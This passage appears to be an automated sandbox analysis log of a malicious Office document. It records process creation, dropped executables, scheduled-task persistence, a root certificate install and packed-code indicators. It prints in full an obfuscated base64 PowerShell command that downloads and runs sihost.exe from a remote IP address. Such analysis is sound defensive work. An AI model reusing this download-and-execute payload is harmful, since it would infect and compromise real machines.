CAgICAgICBsa3lrV0RleGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUMjVndGZvdEV1Uzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvNDAvc2lob3N0LmV4ZSIsIiRFblY6QVBQREFUQVxzaWhvc3QuZXhlIiwwLDApO1N0YVJULVNMZUVwKDMpO1N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXHNpaG9zdC5leGUi'+[chAr]34+'))')))"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERShELL.eXE -Ex bYPasS -nOP -W 1 -c DevIcECRedENTIaLdePlOYmENT.EXE ; ieX($(IEX('[SyStEm.TEXT.eNcODinG]'+[char]58+[cHaR]0x3a+'UTf8.gEtsTriNG([sYSTeM.COnVErT]'+[cHar]58+[CHAr]0X3A+'FrOMbaSE64stRING('+[chAr]0x22+'JFQyNWd0Zm90RXVTICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlRmlOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0NsdUJFTW8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0lVLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUdqRCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZVnZGVnlSdE4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsa3lrV0RleGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUMjVndGZvdEV1Uzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvNDAvc2lob3N0LmV4ZSIsIiRFblY6QVBQREFUQVxzaWhvc3QuZXhlIiwwLDApO1N0YVJULVNMZUVwKDMpO1N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXHNpaG9zdC5leGUi'+[chAr]34+'))')))"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERShELL.eXE -Ex bYPasS -nOP -W 1 -c DevIcECRedENTIaLdePlOYmENT.EXE ; ieX($(IEX('[SyStEm.TEXT.eNcODinG]'+[char]58+[cHaR]0x3a+'UTf8.gEtsTriNG([sYSTeM.COnVErT]'+[cHar]58+[CHAr]0X3A+'FrOMbaSE64stRING('+[chAr]0x22+'JFQyNWd0Zm90RXVTICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlRmlOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0NsdUJFTW8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0lVLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUdqRCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZVnZGVnlSdE4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsa3lrV0RleGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUMjVndGZvdEV1Uzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvNDAvc2lob3N0LmV4ZSIsIiRFblY6QVBQREFUQVxzaWhvc3QuZXhlIiwwLDApO1N0YVJULVNMZUVwKDMpO1N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXHNpaG9zdC5leGUi'+[chAr]34+'))')))"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\d1xzy0xm\d1xzy0xm.cmdline"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\d1xzy0xm\d1xzy0xm.cmdline"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE8943022D push eax; iretd 7_2_000007FE89430241
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE894300BD pushad ; iretd 7_2_000007FE894300C1
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 12_2_00453225 push EBFFFF3Ah; ret 12_2_0045322A
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 12_2_0051BC50 push esp; retf 12_2_0051BC51
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 12_2_0051BC98 pushfd ; retf 12_2_0051BC99
                        Source: C:\Users\user\AppData\Roaming\sihost.exeCode function: 17_2_003621E7 push ebx; iretd 17_2_003621EA
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 19_2_00213225 push EBFFFF3Ah; ret 19_2_0021322A
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 19_2_00A6BC98 pushfd ; retf 0069h19_2_00A6BC99
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 19_2_00A6BD88 push eax; retf 19_2_00A6BD89
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeCode function: 29_2_003721E7 push ebx; iretd 29_2_003721EA
                        Source: sihost[1].exe.7.drStatic PE information: section name: .text entropy: 7.984219707116671
                        Source: sihost.exe.7.drStatic PE information: section name: .text entropy: 7.984219707116671
                        Source: bKVNuVuE.exe.12.drStatic PE information: section name: .text entropy: 7.984219707116671
                        Source: 12.2.sihost.exe.4335920.4.raw.unpack, a6V721GHmT2eX5khYe.csHigh entropy of concatenated method names: 'S0cJSghWdv', 'x2yJe7dCyt', 'c5PJNtkQLp', 's9YJUvyk7D', 'hHyJBKTqjp', 'QjdJn3nvFv', 'fB3JVWUfTQ', 'GrTJjY4PE3', 'oedJk8HPIx', 'zP8J9Z8ais'
                        Source: 12.2.sihost.exe.4335920.4.raw.unpack, MffRHZOvefcJRPnUKL.csHigh entropy of concatenated method names: 'dyFi3y8SrG', 'IHsiXsD2hq', 'axiiwtoqB2', 'tFhiZVMfJ2', 'A4ci4bnoqg', 'mKLiFFmx99', 'K6UiYBIK8F', 'RQBimdYSN4', 'AMXB1IGZ7kTjO3RLNmu', 'mvaeT0GjmDgc647k0LT'
                        Source: 12.2.sihost.exe.4335920.4.raw.unpack, AA4p1aPs3MpvkODx1tA.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OwuASoYeFh', 'zA4AeHhGIh', 'GKMANL37al', 'AQBAUjQZk4', 'Bh2ABqpXSl', 'PawAnIEmWb', 'ac5AVkgjg5'
                        Source: 12.2.sihost.exe.4335920.4.raw.unpack, VKvMLojef0VPhNfFJH.csHigh entropy of concatenated method names: 'DNsCgBUI54', 'EJMCJLN3fy', 'EUCCutPUvI', 'm0VCWp40Yu', 'OkdCiaFuq6', 'bHNCpT6iKO', 'IQkCT8wVUw', 'rYQCy2Mh9k', 'BwjCcIwfIc', 'ekbCopBTur'
                        Source: 12.2.sihost.exe.4335920.4.raw.unpack, shSOyyntItUZ6wMqLM.csHigh entropy of concatenated method names: 'lJP2jQRp73', 'u0629gh6Hd', 'kH0CHKjffC', 'X7pCPJwAuy', 'OQ62qofHGI', 'zJy2hE5Oko', 'IHK2rlM8JF', 'j8l2SRZA1o', 'xRd2eMRT9Z', 'YVo2N5sCFH'
                        Source: 12.2.sihost.exe.4335920.4.raw.unpack, aNj8ZpYPsCsp2bK4DE.csHigh entropy of concatenated method names: 'JNouZfZJp7', 'f4uu4TAkE7', 'z4SuG56qqS', 'BCHuYgcYDf', 'Shuud2eOiJ', 'gROu859C5n', 'GQ7u2Oy0NS', 'OrsuCbwSjR', 'c84uLcqQm5', 'OejuA1S3js'
                        Source: 12.2.sihost.exe.4335920.4.raw.unpack, DnRpKcuiW55bH5UdBn.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'oP01kWHc6Z', 'PPO19CPUtm', 'IDG1zRsAlr', 'HjYsH65djZ', 'hMGsPSFeuC', 'wgqs18qfb4', 'ChIssv9v06', 'AGc9S1Sb0cIh3s6e3rU'
                        Source: 12.2.sihost.exe.4335920.4.raw.unpack, OVSZFRmXCOw5I5H5p0.csHigh entropy of concatenated method names: 'VfJWbvNILT', 'uDhWFide7k', 'QB8utiWJp7', 'srLuO7xRW6', 'lrKuRPmi9A', 'R4TulXmNkK', 'RbcuDnGdgZ', 'MWSu6jkiq9', 'L0xuxV9CKW', 'x2Eu0pYgaF'
                        Source: 12.2.sihost.exe.4335920.4.raw.unpack, UHxRbP9imJpc2xKYpC.csHigh entropy of concatenated method names: 'nvyLPYrpZ1', 'qogLsOcFRK', 'HZ6LIHvXcG', 'CSCLgDpnXF', 'RkWLJ5R4vy', 'VJILWAtRVO', 'ogrLiBfXYW', 'iFFCVCZOHn', 'NMdCj1YNaw', 'EuaCksMljJ'
                        Source: 12.2.sihost.exe.4335920.4.raw.unpack, NLEZ6Cra89ybkWgZr4.csHigh entropy of concatenated method names: 'lPg5GCwq9l', 'PeW5Y1JK1O', 'eOn5Q3WjKJ', 'JNh5KUm6nS', 'e5t5OyTWaW', 'El95RZ7Mal', 'T3M5DTZpR7', 'Fiu56Z7ZQF', 'AgN50JUqtn', 'kEw5qi7aeE'
                        Source: 12.2.sihost.exe.4335920.4.raw.unpack, wbGP5JQX6tnQuQxou8.csHigh entropy of concatenated method names: 'Sbyi79bKl0', 'Bl2iJYr2nU', 'r9viWu7ej3', 'a0cipbiUHi', 'DZoiTx5DoY', 'XJpWB4uUvu', 'rkGWnYRrZ2', 'huUWVF1A8G', 'cWiWjSvrhc', 'J08Wk6wB66'
                        Source: 12.2.sihost.exe.4335920.4.raw.unpack, Vm0MLi1nhAfU8FyUuf.csHigh entropy of concatenated method names: 'pi3wOBBiu', 'RMMZsikTR', 'PEH4XxCUS', 'V9MFpFptB', 'cApYyE1hW', 'oH1m721eR', 'hpmyDmHtLTnk3VGqIV', 'fN7Q7xufrAcviTPuAP', 'A6NCYafZh', 'X4yAj3O2P'
                        Source: 12.2.sihost.exe.4335920.4.raw.unpack, jZdXSaIiEYyc6S2PNo.csHigh entropy of concatenated method names: 'JGHPp6V721', 'amTPT2eX5k', 'jPsPcCsp2b', 'G4DPoEqVSZ', 'nH5Pdp0EbG', 'a5JP8X6tnQ', 'XqLbvuLpXYDE6jwuWl', 'VZZHAWRur8vRtuUlnD', 'otnPPsY9bW', 'XQIPsP8Fgw'
                        Source: 12.2.sihost.exe.4335920.4.raw.unpack, r1BPG2knaPPeefGwtR.csHigh entropy of concatenated method names: 'y7KCQkptmu', 'yTSCKnmxaN', 'MZdCtTWj8Z', 'dFVCOfdhvV', 'FFMCSKngFQ', 'kAsCRiQTtI', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 12.2.sihost.exe.4335920.4.raw.unpack, v6YiYTTLP0FbJiwAyi.csHigh entropy of concatenated method names: 'XDSs7G18lM', 'XiDsgfjXqN', 'TLBsJIc5WW', 'KLwsuEBUrH', 'xr4sWeUCfF', 'hC0siNtARy', 'AbCspT0V6d', 'fjTsT3BIJ9', 'cjQsy5WW2x', 'hhxscCprwl'
                        Source: 12.2.sihost.exe.4335920.4.raw.unpack, QrUtZID1OdMhTK05T1.csHigh entropy of concatenated method names: 'oispg5ijde', 'HOWpuvI7FG', 'ngjpiq7fkI', 'vKCi9mlwG8', 'MI8iziJ60H', 'IkapHy1Pc2', 'cb4pPsl9cG', 'QbXp1tsQnN', 'N8fpsaYTXd', 'I0PpI1kSHM'
                        Source: 12.2.sihost.exe.4335920.4.raw.unpack, TF4m0qPHGZP9v22QXnd.csHigh entropy of concatenated method names: 'bnXLXLZx2E', 'LSoLaP87fh', 'KlbLwDLhPp', 'edmLZVRStI', 'jhWLbDME4o', 'NQGL4eylJt', 'BFyLFey7Bu', 'mvQLGv0mjS', 'ST1LYLIb2s', 'gDbLmr61o2'
                        Source: 12.2.sihost.exe.4335920.4.raw.unpack, NRqEpCJCGN4TlxXlSX.csHigh entropy of concatenated method names: 'Dispose', 'BwiPkaftCU', 'yQH1KDpdlL', 'F2qdd83HDF', 'tnKP9vMLoe', 'u0VPzPhNfF', 'ProcessDialogKey', 'gHL1H1BPG2', 'VaP1PPeefG', 'ztR11BHxRb'
                        Source: 12.2.sihost.exe.4335920.4.raw.unpack, BZmwC8xYFPE2rJ61n5.csHigh entropy of concatenated method names: 'wJapXroX9r', 'XclpaJ7WP1', 'euIpwrTdi4', 'kcBpZYVGfv', 'EVZpbA7wlm', 'LuJp47INfM', 'EiqpFLvmi3', 'FtIpGLX9s3', 'j1ypYhUbit', 'JokpmkDWcL'

                        Persistence and Installation Behavior

                        barindex
                        Source: Office documentLLM: Score: 8 Reasons: The screenshot contains a visually prominent image of a Microsoft Office logo with the text 'This document is protected'. This could mislead users into thinking they need to click on a link or button to view the document. The text 'This document is protected' creates a sense of urgency or necessity to take action. Additionally, the use of the Microsoft Office logo impersonates a well-known brand, which can further deceive users into trusting the document. The combination of these elements indicates a high risk of phishing or malware.
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeFile created: C:\Users\user\AppData\Roaming\bKVNuVuE.exeJump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\sihost.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\d1xzy0xm\d1xzy0xm.dllJump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\sihost[1].exeJump to dropped file

                        Boot Survival

                        barindex
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bKVNuVuE" /XML "C:\Users\user\AppData\Local\Temp\tmp8AF2.tmp"
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
